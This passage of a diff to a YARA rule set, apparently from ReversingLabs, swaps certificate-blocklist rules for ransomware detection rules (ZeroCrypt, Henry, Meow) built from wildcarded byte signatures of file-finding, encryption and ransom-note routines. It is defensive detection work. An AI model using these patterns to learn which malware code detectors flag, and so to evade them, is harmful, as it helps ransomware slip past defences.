+            B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D
+            45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84
+            DB 74
+        }
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3
+            F6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B
+            4D ?? 6A ?? 68 ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" and 1583539200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1362E56D34Dc7B501E17Fa1Ac3C3E3D9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zerocrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ZeroCrypt ransomware."
 		author = "ReversingLabs"
-		id = "9dccd009-eca1-5f21-b5ef-1a75f9d93c7d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "89e47d7f-1ac4-570d-8ae1-30f0acc21462"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3580-L3596"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0415c5a49076bab23dfc29ef2d6168b93d6bfde07a89ccb0368d2c967422407a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.ZeroCrypt.yara#L1-L94"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "947925206ded187eac31c5046d75ab017869ae3f8dc906f2e5536d4db219f108"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ZeroCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file_1 = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
+            ?? ?? 64 A3 ?? ?? ?? ?? 8B F2 8B F9 68 ?? ?? ?? ?? 8B D7 8D 4C 24 ?? E8 ?? ?? ?? ??
+            83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8B D0 56 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44
+            24 ?? 72 ?? 8B 16 EB ?? 8B D6 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
+            ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B D6 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8B
+            D7 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0
+            56 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 68 ?? ?? ?? ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 3B C6 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ??
+            ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83
+            7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ??
+            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
+        }
+		$encrypt_file_2 = {
+            C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 66 89 44
+            24 ?? 8D B4 24 ?? ?? ?? ?? 0F 43 BC 24 ?? ?? ?? ?? 8D 44 24 ?? 83 BC 24 ?? ?? ?? ??
+            ?? 50 0F 43 B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 57 56 8B 00 FF D0 85 C0 68 ?? ?? ?? ?? 0F 95 C3 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ??
+            8D 44 24 ?? 8D B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 43 B4 24 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 56 8B 00 FF D0 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6
+            84 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 83 EC ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B 58 ?? 03 18 E8 ?? ?? ??
+            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
+            ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 8B 00 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 84
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B F8 8D 4C 24 ?? 57 BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 4C 24 ?? 8B 41 ?? F6 84 04 ?? ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? BA ?? ?? ?? ??
+            03 C8 8B F3 33 C0 39 41 ?? 0F 44 C2 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ??
+            ?? ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 6A ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F3 0F 6F 00 F3 0F 7F 07 E8 ?? ?? ?? ?? F3 0F 6F
+        }
+		$encrypt_file_3 = {
+            00 F3 0F 7F 47 ?? F3 0F 6F 40 ?? F3 0F 7F 47 ?? F3 0F 6F 40 ?? 8D 84 24 ?? ?? ?? ??
+            50 51 F3 0F 7F 47 ?? 57 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4
+            ?? 85 F6 74 ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B4 24 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 75 ?? 8B 44 24 ?? 8D 4C 24 ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75
+            ?? 83 C8 ?? 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 85 F6 74 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B3 ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? C6 84 24 ??
+            ?? ?? ?? ?? 50 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 32 DB
+            C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF
+            B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 8A C3 C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ??
+            ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO  \"Amaranth\"" and pe.signatures [ i ] . serial == "13:62:e5:6d:34:dc:7b:50:1e:17:fa:1a:c3:c3:e3:d9" and 1575936000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $encrypt_file_3
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4B83593Fc78D92Cfaa9Bdf3F97383964 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Henry : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Henry ransomware."
 		author = "ReversingLabs"
-		id = "8b5a8a8e-16f5-5098-83e5-72820f4f548a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "63627f2b-3205-5790-ba97-8e0d1da39d7c"
+		date = "2021-06-14"
+		modified = "2021-06-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3598-L3614"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "775e41fc102cbaeb9374984380b0e073de2a0075b9a200f8ab644bd1369ba015"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Henry.yara#L1-L80"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e6ab2a8a344d40407118e29ff78f5a0144f42a0fbdee19a80b341b59f056d292"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Henry"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            02 6F ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 06 8E 69 32 ?? 02 6F ?? ?? ?? ?? 0D 16 0B 38 ?? ??
+            ?? ?? 09 07 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? D4 8D
+            ?? ?? ?? ?? 13 ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 26 6F ?? ?? ?? ?? 11 ?? 6F ??
+            ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 18 18 73 ?? ?? ?? ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 09 8E 69 3F ?? ??
+            ?? ?? 2A
+        }
+		$encrypt_files = {
+            02 8E 2D ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 03 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 7A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 28 ??
+            ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 03 08 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 1F ?? 6F ?? ?? ??
+            ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 25 02 16 02 8E 69 6F ?? ?? ??
+            ?? 25 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
+            25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 FE ?? 09 6F ?? ?? ?? ?? DC 06 2A
+        }
+		$setup_environment = {
+            02 28 ?? ?? ?? ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 02 28 ?? ?? ?? ?? 2A
+        }
+		$init_components = {
+            02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02
+            7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19
+            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ??
+            ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ??
+            ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02
+            7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 22 ?? ?? ?? ?? 22 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 02 17 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            02 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 16 28 ?? ?? ?? ?? 02 28 ?? ??
+            ?? ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kometa" and pe.signatures [ i ] . serial == "4b:83:59:3f:c7:8d:92:cf:aa:9b:df:3f:97:38:39:64" and 1579996800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $setup_environment ) and ( $init_components )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_C7505E7464E00Ec1Dccd8D1B466D15Ff : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Meow : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Meow ransomware."
 		author = "ReversingLabs"
-		id = "a75cc09f-de73-5db4-9ace-189e8da99053"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7cebb04d-1cda-5ad1-b412-8b38df7b2550"
+		date = "2022-10-24"
+		modified = "2022-10-24"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3616-L3634"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7c5c84cb9071eff6a1bd7062506b807466bb4a432d1ed073961898c6c08cc4bd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Meow.yara#L1-L84"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b00753d2b150a815279297ddf40d70051d25de1c32bb90f5b706ea7fd36bb871"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Meow"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            72 ?? 8D 45 ?? BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 33 F6 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B4 B5 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C
+            ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 5F 5E 33 C0 5B 8B E5 5D C3 CC 55 8B EC 83 EC
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ??
+            75
+        }
+		$encrypt_files_p2 = {
+            8B 45 ?? 40 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 25 ?? ??
+            ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 74 ?? 8B 4D ?? 8D 46 ?? 03 CF 0F AF C8 89 4D ?? 8B
+            45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 75 ?? B9 ?? ?? ?? ?? 90 8B 45 ?? 99
+            F7 F9 8B 45 ?? 85 D2 74 ?? 48 EB ?? 40 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83
+            C8 ?? 83 C0 ?? 74 ?? EB ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 74 ?? 8B 45 ?? 8D
+            4E ?? 83 C0 ?? 99 F7 F9 B9 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 75 ?? 8B 45
+            ?? 99 F7 7D ?? 8B 45 ?? 85 D2 74 ?? 40 EB ?? 48 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74
+            ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 FF
+            D0 C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 45 ?? 99 F7 F9 8B 45 ?? 85 D2 74 ?? 83 C0
+            ?? 03 C3 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 0F 85
+        }
+		$drop_ransom_note = {
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            FF 74 ?? 8B CF E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 6A
+            ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D0 6A ??
+            68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 8B F0 BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 35 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF D0 B9 ?? ?? ?? ?? 8D BD ??
+            ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? 50 66 A5 A4 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD B8 ??
+            ?? ?? ?? 5F 5B 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files = {
+            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
+            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
+            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
+            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
